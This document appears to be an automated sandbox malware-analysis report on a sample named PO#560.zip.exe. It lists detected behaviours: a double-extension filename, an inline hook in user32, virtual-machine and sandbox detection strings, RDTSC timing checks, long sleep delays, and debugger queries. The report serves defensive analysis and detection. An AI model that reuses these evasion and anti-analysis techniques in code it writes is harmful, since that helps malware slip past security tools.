          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_008CCF0B push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_008CCF02 push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_008CCF6C push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.89802258187

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xEE
          Uses an obfuscated file name to hide its real file extension (double extension)Show sources
          Source: Possible double extension: zip.exeStatic PE information: PO#560.zip.exe
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: Process Memory Space: PO#560.zip.exe PID: 3468, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: PO#560.zip.exe, 00000000.00000002.248519683.0000000008645000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: PO#560.zip.exe, 00000000.00000002.248519683.0000000008645000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PO#560.zip.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO#560.zip.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000008B98E4 second address: 00000000008B98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000008B9B5E second address: 00000000008B9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\PO#560.zip.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\PO#560.zip.exe TID: 4112Thread sleep time: -31500s >= -30000s
          Source: C:\Users\user\Desktop\PO#560.zip.exe TID: 5464Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6684Thread sleep time: -62000s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 912Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PO#560.zip.exeThread delayed: delay time: 31500
          Source: C:\Users\user\Desktop\PO#560.zip.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000005.00000000.261169772.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.261169772.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: PO#560.zip.exe, 00000000.00000002.248519683.0000000008645000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: explorer.exe, 00000005.00000000.260447855.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.260973427.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: PO#560.zip.exe, 00000000.00000002.248519683.0000000008645000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: PO#560.zip.exe, 00000000.00000002.248519683.0000000008645000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: PO#560.zip.exe, 00000000.00000002.248519683.0000000008645000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.261169772.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000005.00000000.253495548.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: PO#560.zip.exe, 00000000.00000002.248519683.0000000008645000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000005.00000000.261169772.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.261169772.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.261281856.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000002.494378645.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: PO#560.zip.exe, 00000000.00000002.248519683.0000000008645000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.260447855.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.260447855.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: PO#560.zip.exe, 00000000.00000002.248519683.0000000008645000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: PO#560.zip.exe, 00000000.00000002.248519683.0000000008645000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: PO#560.zip.exe, 00000000.00000002.248519683.0000000008645000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000005.00000000.260447855.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4_2_0040ACD0 LdrLoadDll,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049FA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A8E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A73D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A81608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049EF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F20A0 mov eax, dword ptr fs:[00000030h]
